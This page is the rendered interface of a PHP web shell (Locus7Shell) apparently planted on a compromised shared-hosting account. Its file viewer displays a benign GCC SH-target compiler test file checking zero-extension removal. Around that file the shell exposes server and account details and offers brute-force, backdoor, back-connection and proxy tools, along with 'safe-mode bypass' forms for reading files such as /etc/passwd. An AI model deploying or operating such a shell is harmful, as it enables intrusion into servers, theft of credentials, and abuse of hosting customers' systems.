Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.target/sh/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     pr51244-17.c (4 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* Check that no unnecessary zero extensions are done on values that are
   results of arithmetic with T bit inputs.  */
/* { dg-do compile }  */
/* { dg-options "-O1" } */
/* { dg-final { scan-assembler-not "extu|exts" } } */

int
test00 (int a, int b, int c, int d)
{
  int x = a == b;
  int y = c == 0;
  return x == y;
}

int
test01 (int a, int b, int c, int d)
{
  int x = a == b;
  int y = c == d;
  return x == y;
}

int
test02 (int a, int b, int c, int d)
{
  int x = a != b;
  int y = c == d;
  return x == y;
}

int
test03 (int a, int b, int c, int d)
{
  int x = a != b;
  int y = c != d;
  return x == y;
}

int
test04 (int a, int b, int c, int d)
{
  int x = a != b;
  int y = c != d;
  return x == y;
}

int
test05 (int a, int b, int c, int d)
{
  int x = a == b;
  int y = c == 0;
  return x != y;
}

int
test06 (int a, int b, int c, int d)
{
  int x = a == b;
  int y = c == 0;
  return x ^ y;
}

int
test07 (int a, int b, int c, int d)
{
  int x = a == b;
  int y = c == 0;
  return x | y;
}

int
test08 (int a, int b, int c, int d)
{
  int x = a == b;
  int y = c == 0;
  return x & y;
}

int
test09 (int a, int b, int c, int d)
{
  int x = a == b;
  int y = c == d;
  return x != y;
}

int
test10 (int a, int b, int c, int d)
{
  int x = a != b;
  int y = c == d;
  return x != y;
}

int
test11 (int a, int b, int c, int d)
{
  int x = a != b;
  int y = c != d;
  return x != y;
}

int
test12 (int a, int b, int c, int d)
{
  int x = a != b;
  int y = c != d;
  return x != y;
}

int
test13 (int a, int b, int c, int d, int e, int f)
{
  int x = a == b;
  int y = c == 0;
  int z = d == e;
  return x == y || x == z;
}

int
test14 (int a, int b, int c, int d, int e, int f)
{
  int x = a == b;
  int y = c == 0;
  int z = d == e;
  return x == y && x == z;
}

int
test15 (int a, int b, int c, int d, int e, int f)
{
  int x = a != b;
  int y = c == 0;
  int z = d == e;
  return x == y || x == z;
}

int
test16 (int a, int b, int c, int d, int e, int f)
{
  int x = a != b;
  int y = c == 0;
  int z = d == e;
  return x == y && x == z;
}

int
test17 (int a, int b, int c, int d, int e, int f)
{
  int x = a != b;
  int y = c != 0;
  int z = d == e;
  return x == y || x == z;
}

int
test18 (int a, int b, int c, int d, int e, int f)
{
  int x = a != b;
  int y = c != 0;
  int z = d == e;
  return x == y && x == z;
}

int
test19 (int a, int b, int c, int d, int e, int f)
{
  int x = a != b;
  int y = c != 0;
  int z = d == e;
  return x == y || x == z;
}

int
test20 (int a, int b, int c, int d, int e, int f)
{
  int x = a != b;
  int y = c != 0;
  int z = d != e;
  return x == y && x == z;
}

int
test21 (int a, int b, int c, int d)
{
  int x = a == b;
  int y = c == 0;
  return x + y;
}

int
test22 (int a, int b, int c, int d)
{
  int x = a != b;
  int y = c == 0;
  return x + y;
}

int
test23 (int a, int b, int c, int d)
{
  int x = a != b;
  int y = c != 0;
  return x + y;
}

int
test24 (int a, int b, int c, int d)
{
  int x = a == b;
  int y = c == 0;
  return x - y;
}

int
test25 (int a, int b, int c, int d)
{
  int x = a != b;
  int y = c == 0;
  return x - y;
}

int
test26 (int a, int b, int c, int d)
{
  int x = a != b;
  int y = c != 0;
  return x - y;
}

int
test27 (int a, int b, int c, int d)
{
  int x = a == b;
  int y = c == 0;
  return x * y;
}

int
test28 (int a, int b, int c, int d)
{
  int x = a != b;
  int y = c == 0;
  return x * y;
}

int
test29 (int a, int b, int c, int d)
{
  int x = a != b;
  int y = c != 0;
  return x * y;
}

int
test30 (int a, int b)
{
  return ((a & 0x7F) == 1)
      | ((a & 0xFF00) == 0x0200)
      | ((a & 0xFF0000) == 0x030000);
}

int
test31 (int a, int b)
{
  return ((a & 0x7F) == 1)
      | ((a & 0xFF00) == 0x0200)
      | ((a & 0xFF0000) == 0x030000)
      | ((a & 0xFF000000) == 0x04000000);
}

int
test32 (int* a, int b, int c, volatile char* d)
{
  d[1] = a[0] != 0;
  return b;
}

int
test33 (int* a, int b, int c, volatile char* d)
{
  d[1] = a[0] == 0;
  return b;
}

char
test34 (int a, int* b)
{
  return (b[4] & b[0] & a) == a;
}

unsigned char
test35 (int a, int* b)
{
  return (b[4] & b[0] & a) == a;
}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0063 ]--